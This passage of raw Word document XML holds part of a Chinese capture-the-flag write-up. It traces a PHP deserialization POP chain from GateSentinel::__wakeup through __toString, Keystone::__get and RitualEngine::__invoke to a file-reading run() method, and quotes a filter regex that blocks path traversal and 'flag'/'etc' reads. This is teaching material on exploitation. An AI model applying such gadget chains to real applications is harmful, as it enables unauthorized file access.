      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">处理此类带有大量类的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> POP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">链题目，切不可毫无头绪地通读全篇。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">强烈建议遵循以下四步走策略：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筛查哪些类内部声明了魔术方法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辨别哪些魔术方法具备被动/自动触发的条件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追踪哪些方法内部存在向外调用其他对象方法的跳板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锁定最终执行了“高危操作”的终点函数</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">经排查，本题中最具威胁的操作潜伏在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">RitualEngine::run()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">当中：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$baseDir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-&gt;target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'/^[A-Za-z0-9_-]+\.txt$/'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DIRECTORY_SEPARATOR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DIRECTORY_SEPARATOR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is_file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filesize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这段逻辑主要实现了以下功能：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能够拉取当前层级目录下的指定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对文件名进行了正则过滤，仅放行由字母、数字、短划线与下划线拼接的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后缀名称。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做了限制防护，杜绝了向上跨目录读取（目录穿越）的可能。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最终使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">highlight_file()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">将目标文本源码回显。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这实际上等同于提供了一个“当前目录下受限的任意</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> txt </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">文件读取”接口。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">联想到第一关末尾我们恰好斩获了一个规整的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文件名，解题路线便豁然开朗：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">整个第二关的核心使命，就是千方百计地构建出一条能够触达</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">RitualEngine::run()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的调用链，并顺势将其内部的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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">属性篡改为我们在前一关拿到的文件名。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="31"/>
    <w:bookmarkStart w:id="36" w:name="header-n254"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">11. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">寻找阶段二的链条触发源</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="32" w:name="header-n255"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">11.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">审视</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GateSentinel::__wakeup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"/\.\.|flag|etc/i"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此处埋藏着一个非常经典的触发机制：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">preg_match</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(...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PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的运行逻辑中，若传入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">preg_match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$this-&gt;object</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">并非普通字符串类型，而是一个对象实例时，解释器会强制将其当作字符串来读取。这一行为将完美触发该对象中可能存在的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">__toString()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">魔术方法。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">循着这条线索，我们马上开始排查：哪一个类中定义了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">__toString()</w:t>
      </w:r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32"/>
    <w:bookmarkStart w:id="33" w:name="header-n262"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">11.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">分析</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GateSentinel::__toString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-&gt;tool[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'blade'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-&gt;tool[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'blade'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]-&gt;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"GateSentinel"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这段代码看似平平无奇，却隐藏着一步至关重要的跨类调用跳板：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-&gt;tool[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'blade'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]-&gt;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假设我们将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">tool['blade']</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实例化为一个拥有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">__get()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">方法的外部对象，那么在尝试获取其并未显式声明的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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">属性时，便会无缝激活该对象的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">__get()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紧接着进行下一步检索：谁实现了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">__get()</w:t>
      </w:r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33"/>
    <w:bookmarkStart w:id="34" w:name="header-n269"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">11.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">解码</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Keystone::__get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-&gt;center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is_object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$safeClasses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'RitualEngine'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'GateSentinel'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'RuneScribe'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'Chronicler'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'Keystone'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get_class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$safeClasses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is_callable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$processor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解析这段代码的处理逻辑：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变量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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">需保证为一个有效的对象实例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确保该对象的归属类在这几个受信任的名单内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若该对象具备被当做函数直接呼叫的能力，则触发</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">$processor()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PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中，怎样才算是一个“可被呼叫”的对象？</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">答案是：内置了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">__invoke()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">魔术方法的类。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">顺藤摸瓜：继续定位</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">__invoke()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的所在之处。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="34"/>
    <w:bookmarkStart w:id="35" w:name="header-n282"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">11.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">终极执行者</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">RitualEngine::__invoke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-&gt;callback))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-&gt;callback)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$obj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$obj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is_string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'run'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$map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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-&gt;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这里便是主导整个阶段二攻击链路的最末端。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">其内部运作轨迹如下：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读取自身的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">$this-&gt;callback</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">属性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对其内容执行嵌套的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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">操作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要求反序列化生成的产物必须是一个双元素数组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约束数组的首个元素必须依然是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">RitualEngine</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的实例对象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限制数组的次个元素为文本字符串类型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假如这第二个元素等于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">"view"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，代码会将其偷换为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">"run"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最后施展出绝杀调用：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">$obj</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-&gt;run()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至此，拼图的最后一块已然归位，完整的攻击链正式打通。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header-n304"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">12. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">梳理阶段二完整的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> POP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">链路</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">我们将前文拆解的碎片拼接起来，形成连贯的流程：</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="37" w:name="header-n306"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">12.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">链路的入口点</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">当系统对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">$_POST['data']</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">进行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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">操作时，若我们构造的根节点对象为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GateSentinel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，则会毫无悬念地拉开帷幕：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">GateSentinel::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</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="37"/>
    <w:bookmarkStart w:id="38" w:name="header-n309"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">12.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">借由</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">__wakeup()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">引发类型转换</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在该方法内部执行了如下判断：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">preg_match</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(...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此时只要令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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">存放另外一个精心准备的对象，便能顺理成章地激活那个对象的：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">__toString</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">()</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="38"/>
    <w:bookmarkStart w:id="39" w:name="header-n314"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">12.3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__toString()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">制造越权取值</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">来到处于内部层级的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GateSentinel::__toString()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，其中包含：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-&gt;tool[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'blade'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]-&gt;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tool['blade']</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">被指向</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Keystone</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的实例时，对虚无的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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">成员进行强行访问，自然会敲开以下方法的大门：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Keystone::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</w:p>
    <w:bookmarkEnd w:id="39"/>
    <w:bookmarkStart w:id="40" w:name="header-n319"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">12.4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__get()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">阶段触发匿名调用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">只要将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Keystone-&gt;center</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">赋值为实现了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">__invoke()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RitualEngine</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实例，接下来的这句代码：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">$processor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便等同于直接扣动了扳机：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">RitualEngine::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</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="40"/>
    <w:bookmarkStart w:id="41" w:name="header-n324"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">12.5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__invoke()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内部进行二次解包</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">我们提前将一段合法的序列化串赋予</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">callback</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，使其被解析为：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某个 RitualEngine 对象</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;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"view"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得益于内部字典的转换机制，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">"view"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">变相成为了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">"run"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，使得最核心的指令得以落位：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那个 RitualEngine 对象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-&gt;run()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="41"/>
    <w:bookmarkStart w:id="42" w:name="header-n329"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
